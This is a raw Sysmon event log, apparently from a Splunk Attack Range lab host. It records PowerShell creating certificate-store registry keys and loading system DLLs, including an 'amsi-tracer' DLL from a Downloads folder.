17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530112Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530111Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530110Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530109Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530108Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530107Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530106Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530105Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530104Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530103Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530102Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530101Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530100Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 734700x80000000000000001530099Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\1453e82bbe76ed1b635a45bb65c64025\Microsoft.Management.Infrastructure.ni.dll10.0.14393.4046csMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.Management.Infrastructure.dllMD5=C92D154E70E677CA20F60D6658E13BF2,SHA256=1CD14319B7E1B2C5B48591D34F6281F198183740CAD6FCD5CAFCCD8FFCD892D9false-Unavailable 12241200x80000000000000001530098Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x80000000000000001530097Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x80000000000000001530096Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x80000000000000001530095Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x80000000000000001530094Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x80000000000000001530093Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x80000000000000001530092Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x80000000000000001530091Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x80000000000000001530090Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs 12241200x80000000000000001530089Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs 12241200x80000000000000001530088Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates 12241200x80000000000000001530087Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x80000000000000001530086Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x80000000000000001530085Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs 12241200x80000000000000001530084Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs 12241200x80000000000000001530083Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates 12241200x80000000000000001530082Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 12241200x80000000000000001530081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs 12241200x80000000000000001530080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs 734700x80000000000000001530079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wldp.dll10.0.14393.3143 (rs1_release.190725-1725)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=51A0208B106B4392AC4B3174B27A39EF,SHA256=EA9955976994C44DC091A07C69E9C863A4D5A960900019D3C4136BDFD1F885D4trueMicrosoft WindowsValid 12241200x80000000000000001530078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates 12241200x80000000000000001530077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x80000000000000001530076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs 12241200x80000000000000001530075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs 12241200x80000000000000001530074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates 12241200x80000000000000001530073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 734700x80000000000000001530072Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140.dll14.28.29913.0 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140.dllMD5=ADE7AAC069131F54E4294F722C17A412,SHA256=92D50F7C4055718812CD3D823AA2821D6718EB55D2AB2BAC55C2E47260C25A76trueMicrosoft CorporationValid 12241200x80000000000000001530071Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 11241100x80000000000000001530070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 12241200x80000000000000001530069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs 12241200x80000000000000001530068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs 734700x80000000000000001530067Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_1.dll14.28.29913.0 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationvcruntime140_1.dllMD5=4DC09CA657822C2E8160255F767597DF,SHA256=922124BA0821AA864A0261ED88BD25F8E40F94C24D00D389E23CD9AB2BFC6BA4trueMicrosoft CorporationValid 12241200x80000000000000001530066Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates 734700x80000000000000001530065Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp140.dll14.28.29913.0 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio®Microsoft Corporationmsvcp140.dllMD5=4B6BA0947F115AE9FD3016D26D57ABB8,SHA256=254DF96324D019A7C4213ABD4178944B8BF2873D0C3EDC1835D4C668F83D7C37trueMicrosoft CorporationValid 12241200x80000000000000001530064Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x80000000000000001530063Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x80000000000000001530062Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x80000000000000001530048Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BC9E1F10DEE6C56171DA6D4AEB57442,SHA256=52445FCFFF79C60E612CF684C02CF6A78D9945E66F3B27522B962FAC289B455Bfalsefalse - insufficient disk space 12241200x80000000000000001530047Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530046Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530045Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530044Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530043Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x80000000000000001530042Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\Downloads\amsi-tracer_x64\amsi-tracer.dll-----MD5=C49E4C751F02B9C53B6B3C6F96A95766,SHA256=9FB83A06470A87C619ED92BB6B189D7DE874FE94B46F498A2DFF6877E5759B6Dfalse-Unavailable 12241200x80000000000000001530041Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530040Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530039Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530038Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530037Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs 12241200x80000000000000001530036Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs 12241200x80000000000000001530035Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates 12241200x80000000000000001530034Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x80000000000000001530033Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x80000000000000001530032Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x80000000000000001530031Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x80000000000000001530030Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x80000000000000001530029Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.516{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 